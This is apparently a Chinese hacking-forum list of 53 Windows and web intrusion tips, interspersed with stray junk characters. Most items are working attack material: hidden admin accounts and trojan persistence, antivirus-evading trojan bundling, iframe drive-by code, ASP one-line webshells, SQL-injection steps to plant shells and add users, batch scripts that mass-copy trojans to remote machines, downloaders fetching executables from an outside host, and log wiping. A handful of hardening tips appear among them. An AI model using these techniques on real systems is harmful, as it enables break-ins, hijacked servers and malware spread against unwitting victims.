1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* u4 ^6 i0 o: [' \% N
cacls C:\windows\system32 /G hqw20:R; Y; e3 k3 c2 j2 o. ` n% G/ w
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入$ E& F& t9 {* ]/ |6 V; P' y
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F' u9 [, X2 f# L6 R( |" d5 |
$ i% M {) z: N5 A; _& z2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
' N% A# B, B% x# }; o( C1 J" a
1 f( I. d: T1 ^4 O1 W3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ ?9 p, c/ k/ D1 P
" }" c* I0 W, _# h4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号( G* s1 p3 R4 e+ I/ b, w0 w5 v
9 K. z# B" E2 R( R
5、利用INF文件来修改注册表7 ]! h$ n3 P5 ^$ O% ~8 P7 }* Q
[Version]1 C/ M9 ^3 Y1 q! o7 B
Signature="$CHICAGO$"9 K# _+ V7 R t: y" z2 `, z x
[Defaultinstall]# t# T% Y! o# G) s6 U+ n; a; r
addREG=Ating# [& F* ^1 g% k% c
[Ating]1 w# T- o8 \7 H) S
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. i, H; J6 ^( C4 R4 s0 I以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
' @1 q- z6 p& \& `! Irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
+ l$ _3 ^# Z) c( q; r4 x% {; }其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
) O+ N6 o' I) X: _) _HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU; y8 |* V4 I* H* a' ~; l
HKEY_CURRENT_CONFIG 简写为 HKCC9 P: b; ^" s' s9 G
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) B3 I. ~" J; i. ?
"1"这里代表是写入或删除注册表键值中的具体数据, t: n D! L: K1 a2 u
( }, n: E: Q1 F5 a* v$ @6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
9 ]( o4 m9 p! M. x多了一步就是在防火墙里添加个端口,然后导出其键值
8 f' F9 d: k) t. s7 O[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# r: c/ F' {6 n: y+ g* K$ r
' R% m' T t. ~" r; F7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ M8 s! f6 @3 _在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。; s! O+ n2 h1 @
) q! Z8 S- T% k n% a2 Y+ v
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。: u( }% [* u2 V/ E# D. c' @
3 C& x. F) p& @* Y; [; F
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
+ ?! X2 W% K# c1 L可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
) u- I+ U, k( F/ V6 S }4 ]& x9 H7 s* G# ?2 s$ ~* y+ A3 I! p
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
6 h( P% Q2 I. l6 q: P) F t& s9 |: Z( F, g
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
* H6 j) @, s! C2 H用法:xsniff –pass –hide –log pass.txt! n; E, [5 D! J( ^) a
; [- v) O6 c% v. I
12、google搜索的艺术" ^+ k; C( b! w% _ N
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”( m' a( \2 x+ x0 V, {% \! J% ]
或“字符串的语法错误”可以找到很多sql注入漏洞。$ T# u# N* K; E8 k* w [( N; p* _
& n1 u. U6 M' \6 N* R13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。4 q& v( z" _4 j. E2 q
1 p" d* q( _0 ~+ o, M' ?/ g) a
14、cmd中输入 nc –vv –l –p 1987. }" ]& }0 X) o8 b- }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃7 B; A9 d0 { B+ [8 N, }
+ K1 }% c" ~4 [3 F15、制作T++木马,先写个ating.hta文件,内容为
! {7 w' w2 k8 m* |$ ^9 Q<script language="VBScript">
4 T8 m4 m( N% `: j# x Tset wshshell=createobject ("wscript.shell" )9 ?; j/ M1 c; K2 q0 U: w
a=wshshell.run("你马的名称",1)! F7 Y1 y; o8 {6 F/ I6 ~5 ^3 o
window.close4 r* k n/ x& `3 k- ^
</script>: w: b! v1 q M5 t" z; r
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。3 A4 _- r" V1 L& e+ T' M
" ^( I. `9 D3 a! s+ y" R16、搜索栏里输入0 L$ g" j- D( g* p! s2 o" V! R$ ^
关键字%'and 1=1 and '%'='
9 A8 b0 a3 ?, o5 G& k1 b关键字%'and 1=2 and '%'='
0 Q8 O6 c/ A7 I7 Y1 D! s比较不同处 可以作为注入的特征字符
' `6 Q% Q* M0 j2 z. e# O a: ?% |& m7 h
17、挂马代码<html>
* L+ g; ?2 z* t( `<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>, \$ e/ C1 @, K/ z; f7 \$ s9 w
</html>( L) t: ~, c2 l, {
+ z" j$ o' i. H( m/ k
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,. T1 N# B8 {6 L5 S* e9 }# q
net localgroup administrators还是可以看出Guest是管理员来。
3 @' X' R6 Q( [0 R: @8 k m" G* Y6 r" l/ \4 V
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ {2 }# [- @; W- n% ~
用法: 安装: instsrv.exe 服务名称 路径
$ @: K$ A+ Q% _& g卸载: instsrv.exe 服务名称 REMOVE$ Y: P: `$ X; M: {& `; s
' _+ E2 j8 p% A5 L) x2 t
3 B1 y3 e' K1 c' G" O: w/ @2 Y
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 {' |$ q. n" {" O( {
不能注入时要第一时间想到%5c暴库。
3 x/ f7 w# m( x: } }- z8 q
& a- x: |9 X' Y& M7 j# A+ Z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 z$ f/ i) o) p8 Z1 g
* E9 T$ w7 J6 M' z) s7 d' g* R
23、缺少xp_cmdshell时) @, |! a' S& U- B, D+ ?
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
* X7 M( E# j7 L假如恢复不成功,可以尝试直接加用户(针对开3389的)
) `+ G9 c5 \' H+ udeclare @o int3 v. x, r! P- f: K4 s6 c% i- Y
exec sp_oacreate 'wscript.shell',@o out9 n: l1 o/ W0 t j# d+ N; a
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员" ~2 O. ~& Y' J, f! K
7 c6 k1 [1 d: W' }/ j24.批量种植木马.bat; |* X% n, g# y9 y* k
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中! N5 O" D* I* o) R' N. b4 |1 u# V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 k" D( J" Y k6 }扫描地址.txt里每个主机名一行 用\\开头
/ ]6 \% Q" K6 m6 h6 |5 d- I
- H7 R% x0 T1 |8 |. U. D3 f( F3 V25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
P' l% I8 |! E4 e {" d5 C
: ]; X \# A% {9 @, }26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.! u. A: q7 U+ V. k2 _
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下. Q+ n, g9 G: p
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
$ U4 H! I/ i4 _6 z2 l
0 P1 q$ C9 l. A; e27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 d- o, |6 T" k& Y
然后用#clear logg和#clear line vty *删除日志" ^* D3 m. F) H
7 K' n/ g/ ?8 r" t; k
28、电脑坏了省去重新安装系统的方法& K' Y: n% _: ]9 X" \
纯dos下执行,
1 Y( d" K4 P) q; P: _" `0 lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, z9 ~& L* z' e
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config6 `0 o+ c0 Q, d4 P( j! r5 s# \
' r0 [+ T! h& I; r6 o3 v; M29、解决TCP/IP筛选 在注册表里有三处,分别是:
$ p$ {3 g% L# p/ \. E, A mHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 \* v E4 B0 o, M) f) vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' N; M6 h; c$ R1 v1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 o6 \7 Q$ J5 o1 _3 |分别用8 Z5 b8 z" G! `& f4 i# d I( Y
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! Z5 G3 {& U% y: S. ]8 o! D
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 T! ^) w7 b9 s [ e
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ }) R. D6 _( i: J
命令来导出注册表项
: S; O: `- ?6 I4 T- p5 F+ X1 C; f8 R然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 y8 ~2 U, w. W0 ^/ i) X* T4 |
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用( {. P0 r1 E& J# n' o
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
. ?1 @& M2 s; a' q) g8 D$ J: `& y% [4 x, ^& D! R. q4 ?
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 X& V3 G [) P0 TSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3$ U6 V4 I' P. f: j4 @
1 ?' _- @# p2 x+ x; V
31、全手工打造开3389工具- t/ L4 z B; i2 T# R: U
打开记事本,编辑内容如下:
. Z7 ]$ K) v, |0 K) f" Eecho [Components] > c:\sql+ I1 x3 b1 T/ B6 W' T% m# t' u+ t( ~
echo TSEnable = on >> c:\sql
3 C$ O6 G* g3 F% G* ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' r+ j0 ^/ |- u) K2 i! M# z编辑好后存为BAT文件,上传至肉鸡,执行( y7 `5 ]- R/ }
2 `; N3 @0 T" _7 F2 i
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马1 A' |7 _$ P( x
% s( h& G. ^& \" N" R: c
33、让服务器重启9 x9 S y% t% u! H r- s
写个bat死循环:
/ k+ n) t1 c6 C' F/ r@echo off
% e$ k* I4 X' @:loop1- i5 w% N' n7 m9 d7 H6 N' I
cls
# R+ z- W: k( R, y5 ystart cmd.exe$ m: U& a9 u4 A+ x& @; V
goto loop1' J; ~) W" U' _9 i* @3 x9 E$ q( x+ N
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
- Y) Z$ c3 q5 B4 H* c- Y8 s8 l3 q! B5 N0 l% z
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,: _0 @+ R9 e1 n' `
@echo off
. E4 A2 w+ T( D' G: vdate /t >c:/3389.txt
$ O# V9 I+ r, stime /t >>c:/3389.txt
. T4 j0 V& M" j6 ^. g2 r$ i/ }attrib +s +h c:/3389.bat
& t6 u$ k4 q& {" P$ eattrib +s +h c:/3389.txt
o0 U8 t3 f0 @. W' Fnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ F2 h' d+ Z4 E8 R& M8 {并保存为3389.bat
+ @, v& W m: _打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
0 \, j( F+ J! {+ l& L
8 H& S5 [! ^& p/ j$ e35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, i9 \* K6 w) n, t* Fstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)8 @9 L. x8 H4 T0 ^! M
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。# e! X- C" H$ M4 {
5 x+ j; Z9 N' N' E2 L
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件7 M' X) ]8 h H: |
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址8 ]- U+ s0 k* E5 ]+ `7 H) l
echo 你的FTP账号 >>c:\1.bat //输入账号
% n( H7 t2 x. Y" e- W _) _echo 你的FTP密码 >>c:\1.bat //输入密码% X. @% s ]9 W- q. ~
echo bin >>c:\1.bat //登入; I. @% a1 I6 B% J$ c; J0 P
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
3 ]4 |# @) T- g. L! y' |, Wecho bye >>c:\1.bat //退出
& L% U# C* q- }7 x8 ?2 @然后执行ftp -s:c:\1.bat即可+ H7 {. X! H; V0 b1 q- _- [
: T. w* o0 D3 K3 |# H5 M; X* O
37、修改注册表开3389两法. D% O" ~ x. N0 U, u3 ]
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表' }; i$ o5 ~3 {* M% ?
echo Windows Registry Editor Version 5.00 >>3389.reg2 U2 l* H% l' f# ~( a/ u! x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 h0 J# a4 v) I( z3 ?( gecho "Enabled"="0" >>3389.reg
- F0 F( }3 O7 w$ [ Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ U4 V: n. G6 U; {0 @$ xNT\CurrentVersion\Winlogon] >>3389.reg
( r, o9 t; i: Y* s S5 ~# lecho "ShutdownWithoutLogon"="0" >>3389.reg
/ a0 f6 ~7 M* ?, P! v: `- xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
. _4 A& } k3 t: z0 W>>3389.reg
% L6 G8 I, m3 ~! q* T5 j' m+ w; S$ uecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' l, ]: S- M5 k- Y; t. \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' \ P7 E- X# k m$ y7 @+ p! d
>>3389.reg
8 i. ~$ q7 o eecho "TSEnabled"=dword:00000001 >>3389.reg
4 i9 ?# O" E% lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg. ?3 A3 |1 `+ [# l! A) `0 [
echo "Start"=dword:00000002 >>3389.reg1 q3 A6 d1 l% M' |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]3 h3 H# j p: p Y- W$ |0 i
>>3389.reg
, F* }1 [; B- s. M0 j7 uecho "Start"=dword:00000002 >>3389.reg' d% F# c) O1 Q4 J3 U. L1 j1 v
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
) g. l [4 _( Wecho "Hotkey"="1" >>3389.reg" x, S$ t, D% B; U1 _- z4 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ E2 I+ n* O7 G9 k- H: }Server\Wds\rdpwd\Tds\tcp] >>3389.reg
, B3 m S8 C. Y8 Z% o8 [4 Necho "PortNumber"=dword:00000D3D >>3389.reg1 D/ n, J. c. G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: S0 e1 C' E7 ]- w1 O9 nServer\WinStations\RDP-Tcp] >>3389.reg
/ g8 B# ?; z) a! p+ [! _echo "PortNumber"=dword:00000D3D >>3389.reg; u, T+ |* U, G/ d. a
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 c9 E" ]' I. B6 x1 W$ @# c
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
5 ^2 h0 ~; C$ h% {! u& m1 L因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效1 s) g: J4 K6 Y# P
(2)winxp和win2003终端开启% R2 g4 Z/ r9 `8 ? X$ D- M8 M5 \8 J! f
用以下ECHO代码写一个REG文件:
+ H" I. ~2 {- {! z. a* jecho Windows Registry Editor Version 5.00>>3389.reg& y- a& Y/ a2 W( ?9 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' k8 r9 G# A' _) g# eServer]>>3389.reg8 S- B' [$ k- ~
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ B* ^' L8 G4 @( recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; _2 T) L- Q7 t5 iServer\Wds\rdpwd\Tds\tcp]>>3389.reg1 S7 O& ?- L+ g- ?
echo "PortNumber"=dword:00000d3d>>3389.reg+ U, R5 ]! J; Q0 M( P/ H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ G: x% f* W- }, _Server\WinStations\RDP-Tcp]>>3389.reg
4 c$ `% X2 f2 Gecho "PortNumber"=dword:00000d3d>>3389.reg
6 S& x$ A$ P* p: W0 d) c) E. P' ?然后regedit /s 3389.reg del 3389.reg
, N$ K6 @8 E: aXP下不论开终端还是改终端端口都不需重启
. d* q% e6 k" ]8 P* p# A
) `- K3 O: m" `2 z38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃" I" z5 ^; Q( q5 Q1 h1 y
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 v* D! w& C3 X) Z1 k) j9 V9 a2 E1 D* s. o6 U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- N& v# h0 C9 _% B
(1)数据库文件名应复杂并要有特殊字符
3 d% _, q4 v& [3 T8 v4 X' e(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 q$ K! m% K8 I$ T4 R1 c: N将conn.asp文档中的
6 }$ C% A& L1 B. d, sDBPath = Server.MapPath("数据库.mdb")$ g/ }) r+ B8 p; `
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath/ G! I$ q6 R4 }' k
* _' q$ F2 F4 u' `* W, Z/ E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置& C6 F) e5 L" `* c' h1 l4 R& I
(3)不放在WEB目录里
6 I c! Z3 G3 {9 I( P$ N4 u& N) E2 C/ i5 J
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉( m( f9 ?1 H2 i+ [! U
可以写两个bat文件# X$ i1 E3 c; M
@echo off
2 J4 z: Z, O" \@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe# E$ A" j) B- T' ~0 S
@del c:\winnt\system32\query.exe
9 Z- l/ g, `) H! v; W@del %SYSTEMROOT%\system32\dllcache\query.exe0 R- p6 T! K: ?) x7 E1 K
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
& n/ G' H/ x$ {% I% J; I+ Y" t* `2 ?* J7 a1 K+ B
@echo off6 P E3 ?) f. x) `5 F0 Z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! P: j0 n& [' f L8 f# v9 w@del c:\winnt\system32\tsadmin.exe- H9 E# ?* B" o; Y9 R+ j9 U; o& r
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 J' f) D* U: ^7 Y# M0 b* a3 k
0 }6 o4 X$ j& _! q5 j: P41、映射对方盘符
3 O/ K9 c: D5 j" Ztelnet到他的机器上,! }* P& ]8 l/ e8 @
net share 查看有没有默认共享 如果没有,那么就接着运行
8 U& t0 [2 a* A8 a" [9 Snet share c$=c: A9 E% \, E- z# L) H4 y( ]
net share现在有c$
$ n$ @, z% `$ e( Q( H- l! H; ^7 j, U在自己的机器上运行+ Z0 L; ]3 {8 z& S5 | p( P
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K" q$ d6 j* P1 q7 n- z2 b; O3 e: w
# T* m7 Y/ r+ K+ h9 P
42、一些很有用的老知识3 a( @1 a, g/ J! i: B% ^
type c:\boot.ini ( 查看系统版本 )/ u0 @& d3 G7 b
net start (查看已经启动的服务)
% g |+ H e, X: Q; {# b+ Iquery user ( 查看当前终端连接 )
# z: t; r9 l8 f9 D7 D2 _net user ( 查看当前用户 )
, J0 f3 {8 B( `# Tnet user 用户 密码/add ( 建立账号 )
* w- H. A8 O& G! @* {net localgroup administrators 用户 /add (提升某用户为管理员)
, m0 R; ~$ S( Wipconfig -all ( 查看IP什么的 )
, N' ?% t5 Q2 d0 fnetstat -an ( 查看当前网络状态 )5 }3 h+ |6 C( |) u) W8 z" r
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)2 @' ^# o+ ]; c' O: n* n! ?
克隆时Administrator对应1F4
6 g' w3 R$ j( }1 kguest对应1F5
$ j( M6 X2 f& Ttsinternetuser对应3E8
& Y) _' h' @ E
2 o- a$ w- F0 v2 @1 S. n43、如果对方没开3389,但是装了Remote Administrator Service7 x% m; f/ ]5 H# R
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接- o5 P2 n" P5 G- q! X
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- B; U" A/ s3 K0 _" ]先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
: U: R+ ^( R2 H+ B( r2 a" f/ c0 g7 D- N: T" x5 k# q7 N5 o
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)% o5 L z4 A- `0 ^9 ]
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). f4 w# ^% A0 S- \
! m2 M, }7 z. g% c) k45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), m- p! n8 h5 c
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open& N" E6 p$ F& v$ l7 [3 d. l
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =/ r! @3 N3 {3 R+ {, v' \! c6 Y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- M8 |; @3 Z$ Y l
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ Z% k' a8 r" i6 H: O& |(这是完整的一句话,其中没有换行符)0 I) X( Y0 W3 z3 L2 N% n
然后下载:
; a' c# L7 L: h$ Qcscript down.vbs http://www.hack520.org/hack.exe hack.exe' s+ g% l! I6 c+ Q* l3 a
; `" Q# @/ v- U$ S6 G* _/ n46、一句话木马成功依赖于两个条件:6 ?! p2 D" |( U3 j. i+ @0 H/ r
1、服务端没有禁止adodb.Stream或FSO组件9 z: r& }; g9 O+ a0 [5 }$ q8 Q) q, u
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
3 z- u0 o, b7 H
5 E4 q6 P2 p2 `- v5 D* `3 b# Q47、利用DB_OWNER权限进行手工备份一句话木马的代码:% _& c/ \3 O6 {) ~( e' T, q
;alter database utsz set RECOVERY FULL--3 b: c3 [' U* o$ H. A& Z5 C
;create table cmd (a image)--
7 u# g% E3 l' q# @$ R2 L8 K;backup log utsz to disk = 'D:\cmd' with init--% p+ P; g& N" m n
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
: I. ^. \- S2 H) j# k$ ^) X;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--- b" A, \7 {* U( t
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。+ [% s3 @% b8 {
& v# U8 a( y8 z. Y48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
+ a5 P4 d; b. ]; w# q
8 D* B/ n- X, f7 d用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* w* b' A! G" z7 e, W
所有会话用 'all'。% I7 m8 ?7 W/ X6 v1 @, B" Q- l. I
-s sessionid 列出会话的信息。
4 u8 g" m. Y' @7 `" ^8 }-k sessionid 终止会话。3 j* s& I0 z4 P* f8 b# j
-m sessionid 发送消息到会话。
0 ^0 W+ C9 R/ X. {6 Y, U2 M7 d& Q4 r3 b4 H6 b7 x
config 配置 telnet 服务器参数。
6 ^/ q+ `* w( ?1 A# ]* G4 [1 t) _7 g" \, E* H0 z, x: y
common_options 为:
; W2 G' p, `3 `4 A; o: M-u user 指定要使用其凭据的用户' ]( e8 _5 ~/ X6 M
-p password 用户密码
* [* c. h9 s- ^$ ^
; F; A. y i; f7 \" n7 Yconfig_options 为:6 [4 f5 V9 Y, V
dom = domain 设定用户的默认域
, q) l4 V$ f/ e6 D: \ctrlakeymap = yes|no 设定 ALT 键的映射
& _" k* b1 v2 o1 F' b" F, ftimeout = hh:mm:ss 设定空闲会话超时值. d9 T5 K9 H; ^5 T
timeoutactive = yes|no 启用空闲会话。
1 t2 M2 N: w1 z! I8 Umaxfail = attempts 设定断开前失败的登录企图数。0 s9 l9 h8 e5 f- d f6 F0 n
maxconn = connections 设定最大连接数。
) q5 R# Z' i. _9 F# Fport = number 设定 telnet 端口。
& t: J; _ k; ?4 @" o3 H4 n: y4 z/ xsec = [+/-]NTLM [+/-]passwd, \6 o* {$ @$ L3 U7 C
设定身份验证机构
# D' D. o( o" [# J4 ufname = file 指定审计文件名。
& f6 {$ _7 k- T o2 u# }* ufsize = size 指定审计文件的最大尺寸(MB)。5 x X* ~( l9 d# v
mode = console|stream 指定操作模式。
8 r. X( V. x% \+ ^3 f! Qauditlocation = eventlog|file|both
- X! d3 F* v+ F" z% h D+ S指定记录地点+ x( H' M9 }$ D# v8 P8 }! D
audit = [+/-]user [+/-]fail [+/-]admin1 }/ D2 F h. `
) P1 S G( i, I$ _
49、例如:在IE上访问:5 e6 U; Y% }, H0 z5 Y' f' d
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. w% h" l" I* \- \1 a7 S* r" B: N
hack.txt里面的代码是: t3 ^6 b3 D2 j0 B% e
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; b# e/ e) p$ P把这个hack.txt发到你空间就可以了!
* C1 ~+ k* s) }1 J+ ^; N这个可以利用来做网马哦!( r2 [8 t/ W* C" K. O
) e: J0 w% ^) V50、autorun的病毒可以通过手动限制!4 W8 H: B! @/ m9 H$ e! O
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!8 P# T# X- u( K/ m8 R9 j. s5 w( ]
2,打开盘符用右键打开!切忌双击盘符~, V6 h6 a p) E! W
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
4 N" z1 G1 [# W+ c+ y' j6 \
9 ?* }8 t& _- M, u51、log备份时的一句话木马:
( h0 l1 @3 X' V1 B& G) {1 Va).<%%25Execute(request("go"))%%25>5 o b% C8 G. f6 d* Q
b).<%Execute(request("go"))%>
5 O9 e2 y; w' r. pc).%><%execute request("go")%><%5 e& ~- [: O3 j% x- A
d).<script language=VBScript runat=server>execute request("sb")</Script>
& x# ^: x) _8 l; z* E& k je).<%25Execute(request("l"))%25>. V4 U1 i Q; |) g4 W/ P
f).<%if request("cmd")<>"" then execute request("pass")%>
6 e8 a8 m# @. x* B3 j" N
& s! K9 m% m2 z5 a5 V3 B7 }# f52、at "12:17" /interactive cmd6 r6 M3 g7 W$ O
执行后可以用AT命令查看新加的任务% u& Q; Z0 n8 c
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
/ Y) ? q! m5 e3 l' L
) J; v" e& J5 i, W6 {* K53、隐藏ASP后门的两种方法8 u) I, l/ j, `5 V
1、建立非标准目录:mkdir images..\- o, U) g( o/ Y$ p; Q4 X9 [( |
